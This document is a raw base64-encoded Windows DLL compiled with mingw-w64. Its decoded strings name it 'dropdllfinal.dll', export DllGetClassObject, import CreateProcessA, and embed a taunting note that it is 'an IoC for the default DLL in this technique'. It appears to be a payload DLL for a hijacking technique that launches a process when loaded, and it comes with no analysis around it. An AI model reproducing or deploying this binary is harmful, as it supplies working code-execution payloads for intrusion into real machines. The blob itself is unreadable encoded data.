mQAAALkIAAAA6E8BAABIgzsAdF1Ii3MISItDEEg58HQgSI1GCLkIAAAASIlDCEiJPugfAQAAMcBIg8QoW15fXcNIiwtIKc5IifBIwfgDSMHgBEiJwkiJxejwAAAASIXAdEJIiQNIAcZIAehIiUMQ67C6CAAAALkgAAAA6B3///9IhcBIicZIiQN0GUiJQwhIjYAAAQAASIlDEOuAkLj/////65S5CAAAAOinAAAAuP/////rgw8fhAAAAAAAV1ZTSIPsIEiJz7kIAAAA6IwAAABIize5CAAAAEjHRxAAAAAASItfCEjHBwAAAABIx0cIAAAAAOhcAAAASIX2dCRIg+sISDnedxNIiwNIhcB07//QSIPrCEg53nbtSInx6HP+//8xwEiDxCBbXl/DkFNIg+wgicvoLAAAAInZSI0USUjB4gRIAdBIg8QgW8OQ/yUWWAAAkJD/JeZXAACQkP8l1lcAAJCQ/yW2VwAAkJD/JZ5XAACQkP8ljlcAAJCQ/yV+VwAAkJD/JW5XAACQkP8lXlcAAJCQ/yVOVwAAkJD/JT5XAACQkP8lLlcAAJCQ/yUeVwAAkJD/JQ5XAACQkP8l/lYAAJCQ/yXuVgAAkJD/Jd5WAACQkP8lzlYAAJCQ/yW+VgAAkJD/Ja5WAACQkP8lnlYAAJCQ/yWOVgAAkJD/JX5WAACQkP8lblYAAJCQ/yVeVgAAkJD/JU5WAACQkP8lPlYAAJCQ/yUuVgAAkJBWU0iD7DhIjUQkWEiJy7kCAAAASIlUJFhMiUQkYEyJTCRoSIlEJCjo1P7//0G4GwAAALoBAAAASI0Ncg0AAEmJwega/f//SIt0JCi5AgAAAOir/v//SInaSInBSYnw6N38///oEP3//5CQkJCQkJCQ6cvn//+QkJCQkJCQkJCQkP//////////wCv4ZwAAAAAAAAAAAAAAAP//////////AAAAAAAAAAAAAAAAAAAAAPAr+GcAAAAAAAAAAAAAAAD//////////wAAAAAAAAAAAgAAAAAAAAAAAAAAAAAAAOAp+GcAAAAAECn4ZwAAAADgKPhnAAAAAAAAAAAAAAAAUCr4ZwAAAAAAAAAAAAAAADKi3y2ZKwAAAAAAAAAAAADNXSDSZtT//wAAAAAAAAAAQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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AAAAAAB2gwAAAAAAAIaDAAAAAAAAooMAAAAAAAC6gwAAAAAAANSDAAAAAAAA6oMAAAAAAAD+gwAAAAAAABiEAAAAAAAALIQAAAAAAABKhAAAAAAAAFKEAAAAAAAAZoQAAAAAAAB0hAAAAAAAAJCEAAAAAAAAooQAAAAAAAAAAAAAAAAAALKEAAAAAAAAwIQAAAAAAADOhAAAAAAAANqEAAAAAAAA4oQAAAAAAADshAAAAAAAAPSEAAAAAAAA/oQAAAAAAAAGhQAAAAAAABCFAAAAAAAAGoUAAAAAAAAkhQAAAAAAAC6FAAAAAAAAOIUAAAAAAAAAAAAAAAAAAIMAQ2xvc2VIYW5kbGUA3gBDcmVhdGVQcm9jZXNzQQAADQFEZWxldGVDcml0aWNhbFNlY3Rpb24AMQFFbnRlckNyaXRpY2FsU2VjdGlvbgAAGAJHZXRDdXJyZW50UHJvY2VzcwAZAkdldEN1cnJlbnRQcm9jZXNzSWQAHQJHZXRDdXJyZW50VGhyZWFkSWQAAGICR2V0TGFzdEVycm9yAADrAkdldFN5c3RlbVRpbWVBc0ZpbGVUaW1lAAcDR2V0VGlja0NvdW50AABgA0luaXRpYWxpemVDcml0aWNhbFNlY3Rpb24AuANMZWF2ZUNyaXRpY2FsU2VjdGlvbgAARgRRdWVyeVBlcmZvcm1hbmNlQ291bnRlcgCcBFJ0bEFkZEZ1bmN0aW9uVGFibGUAnQRSdGxDYXB0dXJlQ29udGV4dACkBFJ0bExvb2t1cEZ1bmN0aW9uRW50cnkAAKsEUnRsVmlydHVhbFVud2luZAAAQwVTZXRVbmhhbmRsZWRFeGNlcHRpb25GaWx0ZXIAUQVTbGVlcABgBVRlcm1pbmF0ZVByb2Nlc3MAAHQFVGxzR2V0VmFsdWUAggVVbmhhbmRsZWRFeGNlcHRpb25GaWx0ZXIAAKQFVmlydHVhbFByb3RlY3QAAKYFVmlydHVhbFF1ZXJ5AABUAF9faW9iX2Z1bmMAAHsAX2Ftc2dfZXhpdAAASwFfaW5pdHRlcm0AuAFfbG9jawAtA191bmxvY2sABwRhYm9ydAAaBGNhbGxvYwAAQQRmcmVlAABNBGZ3cml0ZQAAmARyZWFsbG9jAKIEc2lnbmFsAAC3BHN0cmxlbgAAugRzdHJuY21wANoEdmZwcmludGYAAACAAAAAgAAAAIAAAACAAAAAgAAAAIAAAACAAAAAgAAAAIAAAACAAAAAgAAAAIAAAACAAAAAgAAAAIAAAACAAAAAgAAAAIAAAACAAAAAgAAAAIAAAACAAAAAgAAAAIAAAEtFUk5FTDMyLmRsbAAAAAAUgAAAFIAAABSAAAAUgAAAFIAAABSAAAAUgAAAFIAAABSAAAAUgAAAFIAAABSAAAAUgAAAFIAAAG1zdmNydC5kbGwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABD4ZwAAAAAAAAAAAAAAAAAAAAAAAAAAIBj4ZwAAAADwF/hnAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAMAAAA2KsAAAAwAAA8AAAAAKAwoDigQKBQoICoiKigqMCoyKjQqNioIKowqkCqUKpgqnCqgKqQqqCqsKrAqtCq4KrwqgCQAAAQAAAAGKAwoDigAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALAAAAAIAAAAAAAgAAAAAAEAo+GcAAAAAMgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHAAAAAIALgAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAqAAAAAgAAAAAACAEAAAAAQCj4ZwAAAAByKPhnAAAAAAAAAAA5AAAAjwAAAAGA1h4AAAQAFAAAAAgBTW9yZUlvQ3NNb3JlSW9jU01vcmVJb2NTTW9yZUlvQ3NNb3JlSW9jZXZlbm1vcmV0aGlzaXNzb21hbnlJb0NzYXNkYXNkYXNkYXNkYXNkYXNkYXNkYXNkYXNkYXNkYXNkYXNkYXNkYXNkYXNkYXNkYXNkYXNkYXNkYXNkYXNkYXNkYXNkYXNkYXNkYXNkYXNkYXNkYXNkYXNkYXNkYXNkYXNkYXNkYXNkYXNkYXNkYXNkYXNkYXNkYXNkYXNkYXNkYXNkYXNkYXNkSW9jSW9jSW9jSW9jSW9jSW9jSW9DSW9DSW9DSW9DSW9DSW9DSW9DSW9DYwB7AAAAAgEGY2hhcgADBQEAAAIIB2xvbmcgbG9uZyB1bnNpZ25lZCBpbnQAAggFbG9uZyBsb25nIGludAAEdWludHB0cl90AAFLLBIBAAAEd2NoYXJfdAABYhhfAQAAAgIHc2hvcnQgdW5zaWduZWQgaW50AAIEBWludAADdQEAAAIEBWxvbmcgaW50AAUIBQEAAAUITwEAAAUIdQEAAAIEB3Vuc2lnbmVkIGludAACBAdsb25nIHVuc2lnbmVkIGludAACAQh1bnNpZ25lZCBjaGFyAAIQBGxvbmcgZG91YmxlAAIIBGRvdWJsZQACBARmbG9hdAAGX19pbXBfX19tYl9jdXJfbWF4AAJzEJkBAAAFCBgCAAAHCI0BAAApAgAACRIBAAAAAAZfc3lzX2Vycmxpc3QAAqwmGQIAAAZfc3lzX25lcnIAAq0kdQEAAApfX2ltcF9fX2FyZ2MAAhkBEJkBAAAKX19pbXBfX19hcmd2AAIdARN8AgAABQiCAgAABQiNAQAACl9faW1wX19fd2FyZ3YAAiEBFp8CAAAFCKUCAAAFCJMBAAAKX19pbXBfX2Vudmlyb24AAicBE3wCAAAKX19pbXBfX3dlbnZpcm9uAAIsARafAgAACl9faW1wX19wZ21wdHIAAjIBEoICAAAKX19pbXBfX3dwZ21wdHIAAjcBFaUCAAAKX19pbXBfX29zcGxhdGZvcm0AAjwBGSYDAAAFCJ8BAAAKX19pbXBfX29zdmVyAAJBARkmAwAACl9faW1wX193aW52ZXIAAkYBGSYDAAAKX19pbXBfX3dpbm1ham9yAAJLARkmAwAACl9faW1wX193aW5taW5vcgACUAEZJgMAAAZfYW1ibGtzaXoAAzUXnwEAAAZfX3NlY3VyaXR5X2Nvb2tpZQAEfRQ9AQAABm9wdGFyZwAFIw6NAQAABm9wdGluZAAFMQx1AQAABm9wdGVycgAFNgx1AQAABm9wdG9wdAAFOgx1AQAABQgNAQAAA/MDAAAGX2RheWxpZ2h0AAZ6FnUBAAAGX2RzdGJpYXMABnsXgQEAAAZfdGltZXpvbmUABnwXgQEAAAiNAQAAQwQAAAkSAQAAAQAGX3R6bmFtZQAGfRkzBAAACmRheWxpZ2h0AAYWARZ1AQAACnRpbWV6b25lAAYZAReBAQAACnR6bmFtZQAGGgEYMwQAAAICBXNob3J0IGludAAEaGFzaHZhbF90AAcqFp8BAAAEaHRhYl9oYXNoAAcvFbgEAAAFCL4EAAALlAQAAM0EAAAMzQQAAAAFCNMEAAANBGh0YWJfZXEABzYP5AQAAAUI6gQAAAt1AQAA/gQAAAzNBAAADM0EAAAABmh0YWJfaGFzaF9wb2ludGVyAAe7EqYEAAAGaHRhYl9lcV9wb2ludGVyAAe+ENQEAAAOc3RyaW5nb3BfYWxnAAcEnwEAAAodBt4FAAAPbm9fc3RyaW5nb3AAAA9saWJjYWxsAAEPcmVwX3ByZWZpeF8xX2J5dGUAAg9yZXBfcHJlZml4XzRfYnl0ZQADD3JlcF9wcmVmaXhfOF9ieXRlAAQPbG9vcF8xX2J5dGUABQ9sb29wAAYPdW5yb2xsZWRfbG9vcAAHD3ZlY3Rvcl9sb29wAAgPbGFzdF9hbGcACQADMAUAAAj5AwAA7gUAABAAA+MFAAAKdW5zcGVjX3N0cmluZ3MACFgBGu4FAAAKdW5zcGVjdl9zdHJpbmdzAAiuARruBQAAEXN0cmluZ29wX3N0cmF0ZWd5AAwJ3RBrBgAAEm1heAAJ3g98AQAAABJhbGcACd8d3gUAAAQSbm9hbGlnbgAJ4Al1AQAACAADJAYAABFzdHJpbmdvcF9hbGdzADQJ2gisBgAAEnVua25vd25fc2l6ZQAJ3BveBQAAABJzaXplAAnhBbwGAAAEAAhrBgAAvAYAAAkSAQAAAwADrAYAABNwcm9jZXNzb3JfY29zdHMAiAEJ5gjdCwAAEmFkZAAJ5w18AQAAABJsZWEACegNfAEAAAQSc2hpZnRfdmFyAAnpDXwBAAAIEnNoaWZ0X2NvbnN0AAnqDXwBAAAMEm11bHRfaW5pdAAJ6w3yCwAAEBJtdWx0X2JpdAAJ7Q18AQAAJBJkaXZpZGUACe4N8gsAACgSbW92c3gACfAHdQEAADwSbW92engACfEHdQEAAEASbGFyZ2VfaW5zbgAJ8g18AQAARBJtb3ZlX3JhdGlvAAnzDXwBAABIEm1vdnpibF9sb2FkAAn1DXwBAABMEmludF9sb2FkAAn2DQcMAABQEmludF9zdG9yZQAJ+Q0HDAAAXBJmcF9tb3ZlAAn7DXwBAABoEmZwX2xvYWQACfwNBwwAAGwSZnBfc3RvcmUACf4NBwwAAHgUbW14X21vdmUACQABDXwBAACEFG1teF9sb2FkAAk